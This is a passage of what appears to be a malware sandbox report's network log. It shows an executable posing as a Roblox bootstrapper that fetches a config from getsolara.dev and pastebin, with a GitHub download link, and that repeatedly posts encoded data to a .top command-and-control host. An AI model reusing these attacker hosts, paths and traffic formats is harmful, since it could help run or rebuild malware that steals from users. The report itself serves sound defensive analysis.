                                                    Sep 14, 2024 12:54:37.650106907 CEST1012OUTData Raw: 56 55 5c 5f 51 41 5a 5f 5e 5e 56 51 56 5d 54 52 57 55 5c 54 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VU\_QAZ_^^VQV]TRWU\TWQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?<=['.U!\*=&!Y X'+&94+?1* :/&F/%Z-1
                                                    Sep 14, 2024 12:54:37.989903927 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:38.124530077 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    99192.168.2.46286680.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:38.276174068 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:38.634526968 CEST1008OUTData Raw: 56 54 59 5c 54 43 5a 59 5e 5e 56 51 56 5b 54 5a 57 50 5c 5b 57 5e 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY\TCZY^^VQV[TZWP\[W^U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z<9$5Q >>>[6/;%('&7?7P1>#/&F/%Z--
                                                    Sep 14, 2024 12:54:38.939486980 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:39.068399906 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    100192.168.2.46286780.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:39.208765030 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:39.556346893 CEST1012OUTData Raw: 56 53 59 58 51 46 5f 5f 5e 5e 56 51 56 5f 54 53 57 5e 5c 5e 57 5d 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYXQF__^^VQV_TSW^\^W]U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<6$:"$+*>2"Y'%;8Y2:<?)V1\=X#/,&F/%Z-9
                                                    Sep 14, 2024 12:54:39.981513023 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:40.028269053 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    101192.168.2.46286880.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:40.153672934 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:40.509540081 CEST1008OUTData Raw: 56 5e 5c 5f 54 47 5a 5d 5e 5e 56 51 56 5b 54 5d 57 51 5c 5a 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^\_TGZ]^^VQV[T]WQ\ZW]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?!Y&.:!4;)=1!?Y%88^'93^?)S25] 0"/&F/%Z-1


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    102192.168.2.46286980.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:40.750325918 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:41.103218079 CEST1748OUTData Raw: 56 56 59 5b 54 40 5f 5f 5e 5e 56 51 56 58 54 5e 57 53 5c 5f 57 5a 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VVY[T@__^^VQVXT^WS\_WZUWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(<*3>6'(]=-&6/'+29?X?)<2)9_7=],&F/%Z-%
                                                    Sep 14, 2024 12:54:41.416115999 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:41.544501066 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 15 2a 1a 0a 10 23 29 20 53 2b 2f 04 11 29 1c 3a 58 2b 3c 01 16 29 24 1b 5b 2a 3d 2b 18 24 02 33 06 30 1f 22 07 30 24 3f 1a 21 3b 2e 5a 0c 1d 23 59 23 0a 2a 1e 26 38 32 1c 27 0f 25 00 37 21 23 59 32 02 3d 5d 23 3f 00 5a 3c 3b 21 53 3e 31 07 10 28 3d 3e 43 3b 2e 29 08 23 02 23 51 00 10 26 51 26 3d 2a 02 35 34 22 0b 3d 21 25 59 25 25 32 54 27 02 2d 04 25 3b 29 5f 24 33 01 11 21 31 33 1f 27 02 34 05 20 23 0b 15 28 14 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #*#) S+/):X+<)$[*=+$30"0$?!;.Z#Y#*&82'%7!#Y2=]#?Z<;!S>1(=>C;.)##Q&Q&=*54"=!%Y%%2T'-%;)_$3!13'4 #(#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    103192.168.2.46287080.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:40.891339064 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:41.243894100 CEST1012OUTData Raw: 56 5e 5c 58 54 44 5a 59 5e 5e 56 51 56 5e 54 5c 57 50 5c 5d 57 5b 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^\XTDZY^^VQV^T\WP\]W[UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\<>'>!"Q ]=2#?%87&) +*02)&#0%;&F/%Z-=
                                                    Sep 14, 2024 12:54:41.555797100 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:41.688481092 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    104192.168.2.46287180.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:41.808880091 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:42.165795088 CEST1012OUTData Raw: 56 57 5c 5f 54 49 5f 5f 5e 5e 56 51 56 5c 54 5f 57 5f 5c 54 57 58 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VW\_TI__^^VQV\T_W_\TWXU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]+%'.>V54+=-#?' ')++9'P1\9Y4=[,,&F/%Z-
                                                    Sep 14, 2024 12:54:42.482866049 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:42.618242025 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    105192.168.2.46287280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:42.752290964 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:43.103296041 CEST1012OUTData Raw: 53 55 59 5a 54 49 5a 53 5e 5e 56 51 56 59 54 58 57 5e 5c 5f 57 59 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SUYZTIZS^^VQVYTXW^\_WYUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+<&0=:S!7*.*Z!%(717X? 2*.4)Y8&F/%Z-!
                                                    Sep 14, 2024 12:54:43.444454908 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:43.578006029 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    106192.168.2.46287380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:43.718357086 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:44.391542912 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730172.67.203.1254437152C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-14 10:52:05 UTC63OUTGET / HTTP/1.1
                                                    Host: getsolara.dev
                                                    Connection: Keep-Alive
                                                    2024-09-14 10:52:05 UTC585INHTTP/1.1 200 OK
                                                    Date: Sat, 14 Sep 2024 10:52:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Frame-Options: SAMEORIGIN
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCJqHvvFuVEIAwY6O7S%2BIn8FJK6nWWaxczdzmAhSJNUCIfLUv3f9mxipL%2FQV0mIqjIclveMgbR4Z09PV9rKn%2Bq2PknxSay2cpM%2B1ICX%2B9uGZ1UmKQ%2BMHQBZzKLpCrfvg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=0
                                                    Server: cloudflare
                                                    CF-RAY: 8c2fd3542a7e1760-EWR
                                                    2024-09-14 10:52:05 UTC784INData Raw: 31 31 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                    Data Ascii: 112a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                    2024-09-14 10:52:05 UTC1369INData Raw: 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65
                                                    Data Ascii: les-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookie
                                                    2024-09-14 10:52:05 UTC1369INData Raw: 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 71 5a 71 6e 47 7a 49 7a 4f 58 54 78 56 50 6f 33 63 7a 4f 47 37 5f 6c 32 69 30 43 35 7a 45 32 72 59 7a 68 73 77 77 34 36 6a 73 59 2d 31 37 32 36 33 31 31 31 32 35 2d 30 2e 30 2e 31 2e 31 2d 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73
                                                    Data Ascii: d="GET" enctype="text/plain"> <input type="hidden" name="atok" value="qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/"> <a href="https://www.cloudflare.com/learning/access-management/phis
                                                    2024-09-14 10:52:05 UTC880INData Raw: 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b
                                                    Data Ascii: an class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link
                                                    2024-09-14 10:52:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449731172.67.203.1254437152C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-14 10:52:05 UTC151OUTGET /asset/discord.json HTTP/1.1
                                                    Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/
                                                    Host: getsolara.dev
                                                    2024-09-14 10:52:05 UTC831INHTTP/1.1 200 OK
                                                    Date: Sat, 14 Sep 2024 10:52:05 GMT
                                                    Content-Type: application/json
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Cache-Control: public, max-age=0, must-revalidate
                                                    ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52"
                                                    referrer-policy: strict-origin-when-cross-origin
                                                    x-content-type-options: nosniff
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Qeej%2FznuhvEcwVRNoiCYDHjn9k8udi6W607vKgvuMrNDjeF%2FiM5cL4VoNODDsK70zwvg3bUns5RiDlyfYOAEhrQBFkDykuGb1CyP9dBzil8Va1ooqSjZ%2FsdSKXrl8jD"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Strict-Transport-Security: max-age=0
                                                    Server: cloudflare
                                                    CF-RAY: 8c2fd358eebb4285-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-09-14 10:52:05 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 78 52 43 61 43 37 63 64 42 6e 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                    Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                    2024-09-14 10:52:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449733104.20.3.2354437152C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-14 10:52:08 UTC168OUTGET /raw/pjseRvyK HTTP/1.1
                                                    Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/
                                                    Host: pastebin.com
                                                    Connection: Keep-Alive
                                                    2024-09-14 10:52:08 UTC397INHTTP/1.1 200 OK
                                                    Date: Sat, 14 Sep 2024 10:52:08 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: HIT
                                                    Age: 793
                                                    Last-Modified: Sat, 14 Sep 2024 10:38:55 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8c2fd369fdbf4270-EWR
                                                    2024-09-14 10:52:08 UTC646INData Raw: 32 37 66 0d 0a 7b 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 31 39 22 2c 0d 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 31 32 22 2c 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 79 70 65 73 68 69 31 32 2f 65 6e 64 2f 72 65 6c 65 61 73 65 73 2f 64 6f 77 6e 6c 6f 61 64 2f 72 65 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67
                                                    Data Ascii: 27f{ "BootstrapperVersion": "1.19", "SupportedClient": "version-43ad1853ad91427d", "SoftwareVersion": "3.112", "BootstrapperUrl": "https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe", "SoftwareUrl":"https://g
                                                    2024-09-14 10:52:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449734128.116.123.44437152C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-14 10:52:09 UTC213OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                    Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/
                                                    Host: clientsettings.roblox.com
                                                    Connection: Keep-Alive
                                                    2024-09-14 10:52:10 UTC576INHTTP/1.1 200 OK
                                                    content-length: 119
                                                    content-type: application/json; charset=utf-8
                                                    date: Sat, 14 Sep 2024 10:52:09 GMT
                                                    server: Kestrel
                                                    cache-control: no-cache
                                                    strict-transport-security: max-age=3600
                                                    x-frame-options: SAMEORIGIN
                                                    roblox-machine-id: c0893d27-7be0-f1d5-aa53-d7db1f83ae0e
                                                    x-roblox-region: us-central_rbx
                                                    x-roblox-edge: fra2
                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
